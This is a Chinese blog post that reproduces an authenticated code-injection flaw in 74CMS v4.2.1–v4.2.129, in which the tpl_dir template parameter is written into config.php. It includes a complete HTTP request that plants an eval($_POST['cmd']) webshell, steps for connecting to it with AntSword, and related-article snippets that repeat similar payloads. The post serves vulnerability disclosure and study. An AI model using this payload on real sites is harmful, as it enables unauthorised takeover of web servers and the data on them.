74CMS_v4.2.1-v4.2.129后台Getshell

最新推荐文章于 2022-09-25 18:43:59 发布
最新推荐文章于 2022-09-25 18:43:59 发布
阅读量1k 收藏 8
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/118151916
版权

影响范围

74CMS v4.2.1~v4.2.129

漏洞危害

后台Getshell

攻击类型

后台Getshell

利用条件

登陆后台

漏洞简介

74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell。
 

漏洞分析

漏洞触发位置为TplController.class.php文件中的set函数:
 
74cms_Home_Setup_v4.2.111\74cms_v4.2.111\upload\Application\Admin\Controller\TplController.class.php
从上面可以看到从请求包中获取到的tpl_dir只是进行了一个简单的过滤——去除两边的空格,之后调用“_get_templates_info”来获取模板的信息:
 
之后使用“ads_init”来配置当前主题下的广告位置布局信息
 
 
最后使用updateconfig来更新配置信息,并将之前设置的配置内容写入文件:
 
由此可知,我们之前写入的tpl_dir值最终会被写入config.php文件,而初始情况下config.php为一个数组:
所以我们最后写入的tpl_dir内容文件会代替此处的default,由此可知我们可以构造特殊payload来闭合单引号插入恶意代码最终getshell!
 

漏洞复现

首先下载漏洞环境,之后通过PHPstudy搭建漏洞测试环境:
 
之后使用安装时设置的管理员账号密码进行登录
 
之后依次点击"工具"——》"风格模板",之后点击"可用模板",同时使用burpsuite抓包:
 
 
 
之后修改“tpl_dir”的值为“ ', 'a',phpinfo(),' ”:
之后可以看到成功向配置文件中写入了之前构造的php代码:
 
之后在浏览器中访问可成功执行phpinfo():
 
同时我们也可以构造一句话木马: 
GET /74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.174.160
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.174.160/74cms/index.php?m=admin&c=tpl&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ptacfv3e96fo666m97k6t21su5; think_language=zh-CN; think_template=default
Connection: close

写入后config.php文件内容如下:
之后使用Firefox中的hackbar进行测试与命令执行:
 
之后使用蚁剑可以成功连接并getshell
 
 

漏洞POC

GET /74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.174.160
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.174.160/74cms/index.php?m=admin&c=tpl&a=index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ptacfv3e96fo666m97k6t21su5; think_language=zh-CN; think_template=default
Connection: close

修复建议

升级74CMS到最新版本
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
FLy_鹏程万里
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
74cms 5.0.1 版本命令执行漏洞复现
不忘初心,护天下安全!
10-20 2188
从整体分析来看,对site_domain的输入,只会使用trim,htmlspecialchars,stripslashes,strip_tags,think_filter这几个函数做过滤,对于执行php代码,写入shell,有影响的只有strip_tags,可以通过编码绕过正常的url.php文件内容如下,从之前的代码可以看出更新域名将更新domain和COOKIE_DOMAIN对应的值,原本的域名为74cms.com,写入到文件中会在最前面加一个.。
win2016-apache+php+mysql+74CMS环境搭建
搬砖
04-12 318
双击运行解压目录/bin下的ApacheMonitor.exe,点击桌面右下角图标,然后点击start。安装完成,登陆网址:10.249.128.180/74cms/upload。74CMS管理员 admin 密码 admin。配置:数据库用户名root 密码root。后台管理 admin/admin。
74cms代码执行漏洞
抚琴
01-03 2066
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞 http://192.168.107.131:1026/upload/index.php?m=admin&c=index&a=index http://192.168.107.131:1026/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=%27,%27a%27,eval($_GET[1]),%27 http://192.168.107.13
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
74cms v4.2.1-v4.2.129-后台getshell漏洞复现
浅笑996的博客
06-28 1269
0x00 影响范围 v4.2.1-v4.2.129 0x01 环境搭建 1. 先去官网下载 骑士人才系统基础版(安装包) 2.将下载好的包进行安装 0x02 复现过程 当前版本v4.2.111 点加工具,点击风格模板 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0....
74cms v4.2.1-v4.2.129-后台getshell漏洞 复现
qq_43508668的博客
06-10 383
0x00 影响范围 v4.2.1-v4.2.129 0X01 环境搭建 74CMS官网 下载 v4.2.1-v4.2.129 0X02 漏洞复现 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php 路径:\74cms\up
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
m0_63253040的博客
09-25 3130
先进入网站后台/index.php?然后访问/Application/Home/Conf/config.php。猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码。输入账号aaa回显管理员账号不存在,试试admin。进入后台找到工具=>风格模板=>可用模板,抓包。302跳转登录成功密码就是admin。拉到最下面查看网站cms版本。修改tpl_dir的值为。蚁剑连接找到flag。
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
最新发布
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
make-4.2.1-10.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-11.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-10.el8.x86_64.rpm
12-05
官方离线安装包,亲测可用
固件_S7-1212C_DCDCDC_6ES7212-1AE40-0XB0(V4.2.1-V4.5.2).rar
02-14
标题中的“固件_S7-1212C_DCDCDC_6ES7212-1AE40-0XB0(V4.2.1-V4.5.2).rar”揭示了这个压缩包是关于Siemens S7-1212C PLC(可编程逻辑控制器)的固件更新。S7-1212C是Siemens公司生产的一款紧凑型PLC,广泛应用于...
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2825
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 336
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74cms
记录笔记
04-11 485
将这个74cms的upload目录设置为网站根目录,使用目录扫描工具进行扫描,然后使用burpsuite对后台地址用户名和密码进行爆破。 外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)] 爆出来用户名admin 密码root ...
74cms php在那个文件夹里面,74cms骑士人才网站系统 v5.0/v5.1后台目录地址修改教程...
weixin_35741494的博客
03-27 710
74CMS骑士人才系统是国内比较优秀的人才网站系统,使用的用户也很多,但是很多人想修改后台入口都不知道从何下手。但毕竟默认后台入口admin安全性下降,那么该到底该如何修改后台入口呢,人才港此帖就手把手教您操作步骤,让您彻底解决安全隐患。比如您目前的后台地址是https://www.huitengpet.com/admin想改为https://www.huitengpet.com/rainc,...
74cms前台getshell漏洞
qq_51922767的博客
12-09 987
74cms前台getshell漏洞
php模板引擎如何实现,PHP模板引擎如何实现
weixin_36246029的博客
03-11 147
假设使用标签形式作为模板语法在解析环节我想到两种实现方式1. 利用正则获取标签内容,然后将标签进行规则性的替换并使用eval进行解析,解析完成后再用正则进行替换2. 利用正则获取标签内容,然后将标签进行规则性的替换,替换完成后使用cli执行脚本并返回内容现在的问题是,不太清楚整个流程和这两种实现方式是否正确,或者有别的方式。谢谢回复内容:假设使用标签形式作为模板语法在解析环节我想到两种实现方式1....
D:\Program Files\maven\tools\repository\tk\mybatis\mapper\4.2.1\mapper-4.2.1.pom.part.lock (系统找不到指定的路径。)
11-10
如果在这个过程中出现了D:\Program Files\maven\tools\repository\tk\mybatis\mapper\4.2.1\mapper-4.2.1.pom.part.lock (系统找不到指定的路径。)的错误,可能是由于该路径下的文件被占用或者损坏导致的。可以尝试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值